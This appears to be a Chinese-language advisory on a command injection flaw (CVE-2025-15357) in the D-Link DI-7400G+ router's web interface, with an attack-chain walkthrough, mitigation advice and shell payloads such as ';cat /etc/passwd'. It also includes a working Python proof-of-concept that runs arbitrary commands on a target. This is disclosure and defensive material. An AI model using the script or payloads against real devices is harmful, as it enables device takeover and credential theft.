D-Link DI-7400G+ 命令注入漏洞 (CVE-2025-15357)

漏洞信息

漏洞编号

CVE-2025-15357

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DI-7400G+

漏洞概述

CVE-2025-15357是影响D-Link DI-7400G+路由器19.12.25A1固件版本的一个中等严重性命令注入漏洞。该漏洞存在于设备的Web管理界面中，具体位于/msp_info.htm页面的flag=cmd参数处理功能。由于应用程序对用户输入的cmd参数缺乏充分的输入验证和过滤，攻击者可以通过构造恶意命令字符串并将其注入到底层系统命令执行中。成功利用此漏洞允许未经授权的远程攻击者在受影响设备上执行任意操作系统命令，从而可能导致设备完全沦陷、敏感信息泄露或进一步的内网渗透。由于该漏洞的利用代码已被公开披露，且攻击复杂度较低（CVSS评分6.3），对互联网暴露的D-Link DI-7400G+设备构成了严重的安全威胁。攻击者无需高权限即可发起攻击，且无需目标用户的交互配合，使得批量 exploitation成为可能。

技术细节

D-Link DI-7400G+路由器Web管理界面中的/msp_info.htm页面存在命令注入漏洞。漏洞的根本原因在于服务器端对cmd参数的解析和执行过程缺乏安全编码。当用户通过HTTP GET请求访问/msp_info.htm?flag=cmd&cmd=<malicious_command>时，应用程序直接将用户输入的cmd参数值拼接到系统命令中执行，而未进行任何命令分隔符过滤或特殊字符转义。攻击者可以利用分号、管道符、&&、||等shell命令连接符或反引号$(...)等命令替换语法，在原始命令中注入任意系统命令。例如，通过构造cmd=;cat /etc/passwd或cmd=`whoami`等Payload，攻击者可以在Web服务器权限下执行系统命令。由于该功能通常要求低权限认证，攻击者可以使用默认凭证或弱密码登录后利用此漏洞。漏洞影响固件版本19.12.25A1，攻击者可借此获取设备root权限、窃取网络配置信息或将其作为僵尸网络节点。

攻击链分析

STEP 1

信息收集

攻击者识别目标D-Link DI-7400G+路由器，获取其IP地址并确认Web管理界面可访问（默认端口80）

STEP 2

认证阶段

攻击者使用默认凭证或弱密码登录路由器Web管理界面，获取低权限访问权限

STEP 3

构造恶意请求

攻击者构造包含命令注入Payload的HTTP GET请求，目标URL为/msp_info.htm?flag=cmd&cmd=;恶意命令

STEP 4

命令执行

服务器将用户输入的cmd参数直接拼接到系统命令中执行，攻击者注入的命令以Web服务进程权限运行

STEP 5

权限提升

攻击者可通过写入crontab或上传恶意二进制文件等方式实现持久化控制或获取更高权限

STEP 6

数据窃取与横向移动

攻击者读取敏感配置文件、无线密钥、连接凭证等，并可能以此为跳板攻击内网其他设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15357 PoC - D-Link DI-7400G+ Command Injection
# Target: /msp_info.htm?flag=cmd

def exploit(target_ip, target_port=80, cmd='cat /etc/passwd'):
    """
    Exploit command injection vulnerability in D-Link DI-7400G+
    
    Args:
        target_ip: Target device IP address
        target_port: Target web interface port (default: 80)
        cmd: Command to execute on target system
    
    Returns:
        Response text from the vulnerable endpoint
    """
    base_url = f"http://{target_ip}:{target_port}"
    
    # Construct malicious URL with command injection payload
    # Using semicolon to chain commands
    injection_payload = f";{cmd}"
    
    params = {
        'flag': 'cmd',
        'cmd': injection_payload
    }
    
    try:
        # Send HTTP GET request to vulnerable endpoint
        response = requests.get(
            f"{base_url}/msp_info.htm",
            params=params,
            timeout=10
        )
        
        print(f"[*] Target: {target_ip}:{target_port}")
        print(f"[*] Payload: {injection_payload}")
        print(f"[*] Status Code: {response.status_code}")
        print("\n[+] Response:")
        print(response.text)
        
        return response.text
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [cmd]")
        print(f"Example: python {sys.argv[0]} 192.168.1.1 'cat /etc/passwd'")
        sys.exit(1)
    
    target = sys.argv[1]
    command = sys.argv[2] if len(sys.argv) > 2 else 'cat /etc/passwd'
    
    exploit(target, 80, command)

影响范围

D-Link DI-7400G+ 固件版本 19.12.25A1

防御指南

临时缓解措施

立即将D-Link DI-7400G+路由器的Web管理界面从公网访问中移除，配置防火墙仅允许内网受信任IP访问管理界面。同时修改默认管理密码，并持续关注D-Link官方安全公告以获取固件更新。如无法立即修补，应考虑部署网络隔离措施，限制该设备在内网中的访问权限，防止攻击成功后横向移动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15357
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15357
3 Details https://www.cvedetails.com/cve/CVE-2025-15357/
4 VulDB https://vuldb.com/cve/CVE-2025-15357
5 Link https://github.com/xyh4ck/iot_poc/tree/main/D-Link_DI_7400G%2B_Command_Injection
6 Link https://vuldb.com/?ctiid.338743
7 Link https://vuldb.com/?id.338743
8 Link https://vuldb.com/?submit.726376
9 Link https://www.dlink.com/